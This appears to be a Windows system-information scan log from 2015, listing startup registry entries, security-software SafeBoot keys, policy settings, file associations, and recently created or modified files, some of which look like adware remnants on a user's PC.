[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01 1724032]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-08-30 172640]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"=C:\Program Files (x86)\Analog Devices\Core\smax4pnp.exe [2009-04-23 1314816]
"ADSKAppManager"=C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgr.exe [2015-09-07 523144]
"Adobe ARM"=C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19 1022152]
"Dropbox"=C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [2015-08-14 39175960]
"ArchVision Dashboard"=C:\Program Files (x86)\ArchVision\Dashboard\Dashboard.exe [2015-06-11 2520936]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2015-08-04 597552]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Autodesk Sync"=C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [2015-01-27 1310088]
"Web Companion"=C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize []
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
AutoCAD Startup Accelerator.lnk - C:\Program Files (x86)\Common Files\Autodesk Shared\acstart16.exe
NETGEAR A6210 Genie.lnk - C:\Program Files (x86)\NETGEAR\A6210\A6210.EXE
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37Crusader]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HitmanPro37CrusaderBoot]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\hitmanpro37]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\hitmanpro37.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HitmanPro37Crusader]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HitmanPro37CrusaderBoot]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\McMPFSvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\McNaiAnn]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\MCODS]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mcpltsvc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfeaack]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfeaack.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfeavfk]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfeavfk.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfefire]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfefirek]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfefirek.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfehidk]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfehidk.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfemms]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfencbdc]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfencbdc.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfetdi2k]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfetdi2k.sys]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\mfevtp]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"DisableTaskMgr"=0
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
""=
"NoRun"=0
"NoFolderOptions"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoActiveDesktop"=1
"NoActiveDesktopChanges"=1
"ForceActiveDesktopOn"=0
"NoRun"=0
"NoFolderOptions"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\SysWOW64\l3codeca.acm
"vidc.cvid"=iccvid.dll
"msacm.siren"=sirenacm.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave3"=wdmaud.drv
"midi3"=wdmaud.drv
"mixer3"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv
"wave4"=wdmaud.drv
"midi4"=wdmaud.drv
"mixer4"=wdmaud.drv
"wave5"=wdmaud.drv
"midi5"=wdmaud.drv
"mixer5"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.scr - open - "C:\Windows\notepad.exe" "%1"
.scr - install -
.scr - config -
======List of files/folders created in the last 2 months======
2015-09-13 19:04:48 ----D---- C:\rsit
2015-09-13 19:04:48 ----D---- C:\Program Files (x86)\trend micro
2015-09-13 18:50:31 ----D---- C:\Users\Leslie\AppData\Roaming\Sun
2015-08-30 06:54:25 ----D---- C:\Program Files (x86)\Common Files\Java
2015-08-30 06:53:07 ----D---- C:\Program Files (x86)\Common Files\Skype
2015-08-25 20:36:18 ----D---- C:\Users\Leslie\AppData\Roaming\ProductData
2015-08-25 20:36:10 ----D---- C:\ProgramData\ProductData
2015-08-25 15:01:07 ----A---- C:\Windows\ntbtlog.txt
2015-08-25 11:09:43 ----D---- C:\ProgramData\HitmanPro
2015-08-25 10:32:23 ----D---- C:\ProgramData\Malwarebytes
2015-08-25 10:32:23 ----D---- C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-08-25 10:16:53 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-25 10:16:50 ----D---- C:\Program Files (x86)\Mozilla Firefox
2015-08-25 09:39:08 ----A---- C:\Windows\_MSRSTRT.EXE
2015-08-25 07:53:32 ----D---- C:\ProgramData\{D76294E6-03B8-4971-AF2E-3F846161A690}
2015-08-25 07:53:28 ----D---- C:\ProgramData\{ACBCD40A-42A8-4FF9-BD42-ABCD14998CBA}
2015-08-25 07:53:27 ----D---- C:\Program Files (x86)\Common Files\IObit
2015-08-25 07:51:22 ----D---- C:\Users\Leslie\AppData\Roaming\Apple Computer
2015-08-25 07:51:13 ----D---- C:\ProgramData\IObit
2015-08-25 07:51:09 ----D---- C:\Users\Leslie\AppData\Roaming\IObit
2015-08-25 07:51:03 ----D---- C:\Program Files (x86)\IObit
2015-08-25 07:02:17 ----D---- C:\AdwCleaner
2015-08-24 16:32:22 ----D---- C:\Program Files (x86)\McAfee.com
2015-08-24 16:31:36 ----D---- C:\Program Files (x86)\McAfee
2015-08-24 16:22:46 ----D---- C:\Program Files (x86)\Common Files\McAfee
2015-08-24 16:22:29 ----D---- C:\ProgramData\McAfee
2015-08-24 15:03:35 ----D---- C:\ProgramData\LocalStorage
2015-08-24 14:19:55 ----D---- C:\ProgramData\PlayGemConfig
2015-08-24 14:19:06 ----D---- C:\Users\Leslie\AppData\Roaming\Opera Software
2015-08-24 14:17:05 ----D---- C:\ProgramData\MSNetCore
2015-08-24 14:05:15 ----D---- C:\ppsfile
2015-08-24 08:42:53 ----D---- C:\NVIDIA
2015-08-24 08:40:30 ----D---- C:\Users\Leslie\AppData\Roaming\McNeel
2015-08-24 08:15:51 ----A---- C:\Windows\SysWOW64\drivers\fiusvhm381.dat
2015-08-24 08:15:51 ----A---- C:\Windows\SysWOW64\drivers\diusvhm262.dat
2015-08-24 08:15:51 ----A---- C:\Windows\i_oirotq582.ini
2015-08-24 08:15:51 ----A---- C:\Windows\d_oirotq229.ini
2015-08-24 08:15:48 ----D---- C:\ProgramData\McNeel
2015-08-24 08:15:48 ----D---- C:\Program Files (x86)\McNeelUpdate
2015-08-24 08:15:38 ----D---- C:\Program Files (x86)\Common Files\McNeel Shared
2015-08-24 08:15:37 ----D---- C:\Program Files (x86)\Rhinoceros 5
2015-08-24 07:21:13 ----D---- C:\Users\Leslie\AppData\Roaming\Mozilla
2015-08-24 07:20:28 ----A---- C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini
2015-08-24 07:20:26 ----A---- C:\Windows\SysWOW64\LavasoftTcpService.dll
2015-08-19 08:30:07 ----A---- C:\Windows\SysWOW64\mshtml.dll
2015-08-13 01:53:23 ----A---- C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-08-12 19:54:35 ----A---- C:\Windows\SysWOW64\rdvidcrl.dll
2015-08-12 19:54:35 ----A---- C:\Windows\SysWOW64\mstscax.dll
2015-08-12 19:54:34 ----A---- C:\Windows\SysWOW64\tsgqec.dll
2015-08-12 19:54:32 ----A---- C:\Windows\SysWOW64\ntoskrnl.exe
2015-08-12 19:54:31 ----A---- C:\Windows\SysWOW64\ntkrnlpa.exe
2015-08-12 19:54:31 ----A---- C:\Windows\SysWOW64\ntdll.dll
2015-08-12 19:54:31 ----A---- C:\Windows\SysWOW64\kernel32.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\wdigest.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\TSpkg.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\schannel.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\ncrypt.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\msv1_0.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\KernelBase.dll
2015-08-12 19:54:30 ----A---- C:\Windows\SysWOW64\kerberos.dll
2015-08-12 19:54:29 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2015-08-12 19:54:29 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\wow32.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\sspicli.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\srclient.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\setup16.exe
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\secur32.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\rpcrt4.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\ntvdm64.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\cryptbase.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\credssp.dll
2015-08-12 19:54:29 ----A---- C:\Windows\SysWOW64\auditpol.exe
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2015-08-12 19:54:28 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2015-08-12 19:54:28 ----A---- C:\Windows\SysWOW64\apisetschema.dll
2015-08-12 19:54:27 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2015-08-12 19:54:27 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2015-08-12 19:54:27 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2015-08-12 19:54:27 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2015-08-12 19:54:27 ----AH---- C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2015-08-12 19:54:27 ----A---- C:\Windows\SysWOW64\user.exe
2015-08-12 19:54:27 ----A---- C:\Windows\SysWOW64\msobjs.dll
2015-08-12 19:54:27 ----A---- C:\Windows\SysWOW64\msaudite.dll
2015-08-12 19:54:27 ----A---- C:\Windows\SysWOW64\instnm.exe
2015-08-12 19:54:27 ----A---- C:\Windows\SysWOW64\adtschema.dll
2015-08-12 19:54:11 ----A---- C:\Windows\SysWOW64\iernonce.dll
2015-08-12 19:54:11 ----A---- C:\Windows\SysWOW64\ieetwproxystub.dll
2015-08-12 19:54:10 ----A---- C:\Windows\SysWOW64\urlmon.dll
2015-08-12 19:54:10 ----A---- C:\Windows\SysWOW64\mshtmled.dll
2015-08-12 19:54:10 ----A---- C:\Windows\SysWOW64\iertutil.dll
2015-08-12 19:54:10 ----A---- C:\Windows\SysWOW64\iedkcs32.dll
2015-08-12 19:54:09 ----A---- C:\Windows\SysWOW64\vbscript.dll
2015-08-12 19:54:09 ----A---- C:\Windows\SysWOW64\msfeeds.dll
2015-08-12 19:54:09 ----A---- C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-08-12 19:54:09 ----A---- C:\Windows\SysWOW64\dxtrans.dll
2015-08-12 19:54:08 ----A---- C:\Windows\SysWOW64\iesetup.dll
2015-08-12 19:54:08 ----A---- C:\Windows\SysWOW64\ieapfltr.dll
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\jsproxy.dll
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\jscript9diag.dll
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\jscript.dll
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\ieUnatt.exe
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\ieui.dll
2015-08-12 19:54:07 ----A---- C:\Windows\SysWOW64\dxtmsft.dll
2015-08-12 19:54:06 ----A---- C:\Windows\SysWOW64\ieframe.dll
2015-08-12 19:54:05 ----A---- C:\Windows\SysWOW64\mshtmlmedia.dll
2015-08-12 19:54:05 ----A---- C:\Windows\SysWOW64\jscript9.dll
2015-08-12 19:54:04 ----A---- C:\Windows\SysWOW64\wininet.dll
2015-08-12 19:54:04 ----A---- C:\Windows\SysWOW64\msrating.dll
2015-08-12 19:54:04 ----A---- C:\Windows\SysWOW64\MshtmlDac.dll
2015-08-12 19:53:38 ----A---- C:\Windows\SysWOW64\WebClnt.dll
2015-08-12 19:53:38 ----A---- C:\Windows\SysWOW64\davclnt.dll
2015-08-12 19:53:37 ----A---- C:\Windows\SysWOW64\msxml6r.dll
2015-08-12 19:53:37 ----A---- C:\Windows\SysWOW64\msxml6.dll
2015-08-12 19:53:37 ----A---- C:\Windows\SysWOW64\msxml3r.dll
2015-08-12 19:53:37 ----A---- C:\Windows\SysWOW64\msxml3.dll
2015-08-12 19:53:36 ----A---- C:\Windows\SysWOW64\DWrite.dll
2015-08-12 19:53:36 ----A---- C:\Windows\SysWOW64\atmfd.dll
2015-08-12 19:53:35 ----A---- C:\Windows\SysWOW64\lpk.dll
2015-08-12 19:53:35 ----A---- C:\Windows\SysWOW64\fontsub.dll
2015-08-12 19:53:35 ----A---- C:\Windows\SysWOW64\dciman32.dll
2015-08-12 19:53:35 ----A---- C:\Windows\SysWOW64\d3d10warp.dll
2015-08-12 19:53:35 ----A---- C:\Windows\SysWOW64\atmlib.dll
2015-08-12 19:53:34 ----A---- C:\Windows\SysWOW64\notepad.exe
2015-08-12 19:53:34 ----A---- C:\Windows\notepad.exe
2015-08-12 19:53:33 ----A---- C:\Windows\SysWOW64\shell32.dll
2015-08-12 19:53:32 ----A---- C:\Windows\SysWOW64\wuwebv.dll
2015-08-12 19:53:32 ----A---- C:\Windows\SysWOW64\wuapi.dll
2015-08-12 19:53:31 ----A---- C:\Windows\SysWOW64\wups.dll
2015-08-12 19:53:31 ----A---- C:\Windows\SysWOW64\wudriver.dll
2015-08-12 19:53:31 ----A---- C:\Windows\SysWOW64\wuapp.exe
2015-08-02 09:42:01 ----D---- C:\Temp
2015-08-02 09:39:27 ----D---- C:\RPC
2015-08-02 09:39:27 ----D---- C:\ProgramData\ArchVision
2015-08-02 09:39:27 ----D---- C:\Program Files (x86)\ArchVision
2015-07-29 14:06:13 ----D---- C:\Revit Library
2015-07-23 09:55:08 ----D---- C:\Users\Leslie\AppData\Roaming\Dropbox
2015-07-23 09:54:39 ----D---- C:\Program Files (x86)\Dropbox
2015-07-23 09:54:34 ----D---- C:\ProgramData\Dropbox
2015-07-18 14:42:53 ----D---- C:\Users\Leslie\AppData\Roaming\WinRAR
2015-07-18 00:33:19 ----D---- C:\Downloads
2015-07-18 00:26:29 ----D---- C:\Program Files (x86)\RevitStr2k15
2015-07-18 00:07:15 ----D---- C:\Program Files (x86)\Google
2015-07-18 00:06:58 ----D---- C:\Program Files (x86)\FlashGet
2015-07-16 13:55:28 ----A---- C:\Windows\SysWOW64\xactengine3_7.dll
2015-07-16 13:55:27 ----A---- C:\Windows\SysWOW64\d3dcsx_43.dll
2015-07-16 13:55:25 ----A---- C:\Windows\SysWOW64\xinput1_1.dll
2015-07-16 13:55:25 ----A---- C:\Windows\SysWOW64\xactengine2_1.dll
2015-07-16 13:55:25 ----A---- C:\Windows\SysWOW64\x3daudio1_0.dll
2015-07-16 13:55:22 ----A---- C:\Windows\SysWOW64\d3dx9_30.dll
2015-07-15 19:49:55 ----D---- C:\Users\Leslie\AppData\Roaming\OpenOffice
2015-07-15 18:49:35 ----A---- C:\Windows\SysWOW64\cewmdm.dll
2015-07-15 18:48:15 ----A---- C:\Windows\SysWOW64\InkEd.dll
2015-07-15 18:47:54 ----A---- C:\Windows\SysWOW64\gdi32.dll
2015-07-15 18:13:04 ----D---- C:\Program Files (x86)\MSXML 4.0
2015-07-15 17:39:31 ----A---- C:\Windows\SysWOW64\comctl32.dll
2015-07-15 17:39:28 ----A---- C:\Windows\SysWOW64\ole32.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\wintrust.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\cryptsvc.dll
2015-07-15 17:39:22 ----A---- C:\Windows\SysWOW64\crypt32.dll
2015-07-15 17:39:21 ----A---- C:\Windows\SysWOW64\cryptnet.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msimsg.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msihnd.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msiexec.exe
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\msi.dll
2015-07-15 17:39:18 ----A---- C:\Windows\SysWOW64\authui.dll
2015-07-15 17:38:51 ----A---- C:\Windows\SysWOW64\certcli.dll
2015-07-15 17:38:46 ----A---- C:\Windows\SysWOW64\wmp.dll
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\wmploc.DLL
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\spwmp.dll
2015-07-15 17:38:45 ----A---- C:\Windows\SysWOW64\dxmasf.dll
2015-07-15 17:38:39 ----A---- C:\Windows\SysWOW64\tracerpt.exe
2015-07-15 17:38:39 ----A---- C:\Windows\SysWOW64\advapi32.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\tdh.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\sechost.dll
2015-07-15 17:38:38 ----A---- C:\Windows\SysWOW64\logman.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\typeperf.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\relog.exe
2015-07-15 17:38:37 ----A---- C:\Windows\SysWOW64\diskperf.exe
2015-07-15 16:07:58 ----D---- C:\ProgramData\Samsung
2015-07-15 16:07:58 ----A---- C:\Autoconfig.ini
2015-07-15 13:43:38 ----D---- C:\ProgramData\Ralink
2015-07-15 13:40:40 ----D---- C:\Program Files (x86)\NETGEAR
2015-07-15 13:40:34 ----D---- C:\ProgramData\NETGEAR
2015-07-14 22:09:48 ----D---- C:\Windows\Downloaded Installations
2015-07-14 21:31:24 ----D---- C:\Microstation
2015-07-14 21:17:41 ----D---- C:\$Projects
2015-07-14 17:57:20 ----D---- C:\Users\Leslie\AppData\Roaming\Macromedia
2015-07-14 17:52:30 ----D---- C:\Program Files (x86)\Autodesk
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\Microsoft Office
2015-07-14 17:51:39 ----D---- C:\Program Files (x86)\AnswerWorks 4.0
2015-07-14 17:51:38 ----D---- C:\Program Files (x86)\Common Files\Designer
2015-07-14 17:51:20 ----D---- C:\Program Files (x86)\AutoCAD 2005
2015-07-14 17:46:26 ----D---- C:\AutoCAD
2015-07-14 17:04:02 ----D---- C:\Users\Leslie\AppData\Roaming\Navisworks 2015
2015-07-14 17:04:02 ----D---- C:\Users\Leslie\AppData\Roaming\Autodesk Navisworks Manage 2015
2015-07-14 17:04:02 ----D---- C:\ProgramData\Autodesk Navisworks Manage 2015
2015-07-14 17:02:48 ----D---- C:\ProgramData\FARO
2015-07-14 16:57:21 ----D---- C:\Program Files (x86)\Microsoft WSE
2015-07-14 16:56:28 ----A---- C:\Windows\SysWOW64\D3DX9_43.dll
2015-07-14 16:56:28 ----A---- C:\Windows\SysWOW64\d3dx10_43.dll
2015-07-14 16:46:54 ----D---- C:\Autodesk
2015-07-14 16:35:25 ----D---- C:\Drivers
2015-07-14 16:32:43 ----D---- C:\ProgramData\FLEXnet
2015-07-14 16:21:47 ----D---- C:\Program Files (x86)\Common Files\Autodesk Shared
2015-07-14 16:20:57 ----D---- C:\ProgramData\Package Cache
2015-07-14 16:18:58 ----D---- C:\Users\Leslie\AppData\Roaming\Autodesk
2015-07-14 16:18:58 ----D---- C:\ProgramData\Autodesk
2015-07-14 15:56:29 ----D---- C:\Users\Leslie\AppData\Roaming\Adobe
2015-07-14 15:56:00 ----D---- C:\Users\Leslie\AppData\Roaming\Identities
2015-07-14 15:55:57 ----SD---- C:\Users\Leslie\AppData\Roaming\Microsoft
2015-07-14 15:55:57 ----D---- C:\Users\Leslie\AppData\Roaming\Media Center Programs
======List of files/folders modified in the last 2 months======
2015-09-13 19:04:50 ----D---- C:\Windows\Temp
2015-09-13 19:04:48 ----RD---- C:\Program Files (x86)
2015-09-13 18:54:31 ----D---- C:\Windows\System32
2015-09-13 18:54:31 ----D---- C:\Windows\inf
2015-09-13 18:47:48 ----HD---- C:\ProgramData
2015-09-13 18:45:17 ----D---- C:\ProgramData\NVIDIA
2015-09-05 21:45:42 ----D---- C:\Windows\Microsoft.NET
2015-09-05 12:52:02 ----SHD---- C:\Windows\Installer
2015-09-05 12:51:52 ----D---- C:\ProgramData\Skype
2015-09-05 12:50:51 ----SHD---- C:\System Volume Information
2015-09-05 12:12:58 ----RSD---- C:\Windows\assembly
2015-08-30 06:54:25 ----D---- C:\Program Files (x86)\Common Files
2015-08-30 06:53:58 ----D---- C:\Windows\SysWOW64
2015-08-30 06:53:54 ----A---- C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-08-30 06:53:45 ----D---- C:\Program Files (x86)\Java
2015-08-30 06:53:07 ----RD---- C:\Program Files (x86)\Skype
2015-08-25 15:01:07 ----D---- C:\Windows
2015-08-25 11:10:21 ----RD---- C:\Program Files
2015-08-25 10:58:56 ----HD---- C:\$Windows.~BT
2015-08-25 10:48:08 ----D---- C:\Windows\Panther
2015-08-25 07:53:59 ----D---- C:\Windows\Tasks
2015-08-24 20:00:00 ----D---- C:\Windows\AppPatch
2015-08-24 19:56:41 ----RSD---- C:\Windows\Fonts
2015-08-24 14:17:00 ----D---- C:\Program Files (x86)\Microsoft.NET
2015-08-24 14:05:17 ----SHD---- C:\$Recycle.Bin
2015-08-24 14:02:29 ----A---- C:\Windows\SysWOW64\dnsapi.dll
2015-08-24 08:15:51 ----D---- C:\Windows\SysWOW64\drivers
2015-08-24 07:43:37 ----D---- C:\Windows\Downloaded Program Files
2015-08-19 08:30:09 ----D---- C:\Windows\winsxs
2015-08-14 08:13:34 ----D---- C:\Users
2015-08-13 19:21:42 ----D---- C:\Windows\rescache
2015-08-13 07:13:11 ----D---- C:\Windows\SysWOW64\en-US
2015-08-13 07:13:10 ----D---- C:\Program Files (x86)\Internet Explorer
2015-08-13 01:52:29 ----D---- C:\Program Files (x86)\Microsoft Silverlight
2015-08-12 19:41:19 ----A---- C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-02 00:50:37 ----D---- C:\Windows\Logs
2015-07-24 13:50:17 ----D---- C:\Windows\SoftwareDistribution
2015-07-23 08:17:45 ----D---- C:\Windows\LiveKernelReports
2015-07-19 02:10:09 ----D---- C:\Windows\Help
2015-07-19 02:09:38 ----D---- C:\ProgramData\NVIDIA Corporation
2015-07-16 09:53:00 ----D---- C:\Program Files (x86)\Windows Media Player
2015-07-16 09:03:00 ----SD---- C:\Windows\SysWOW64\GWX
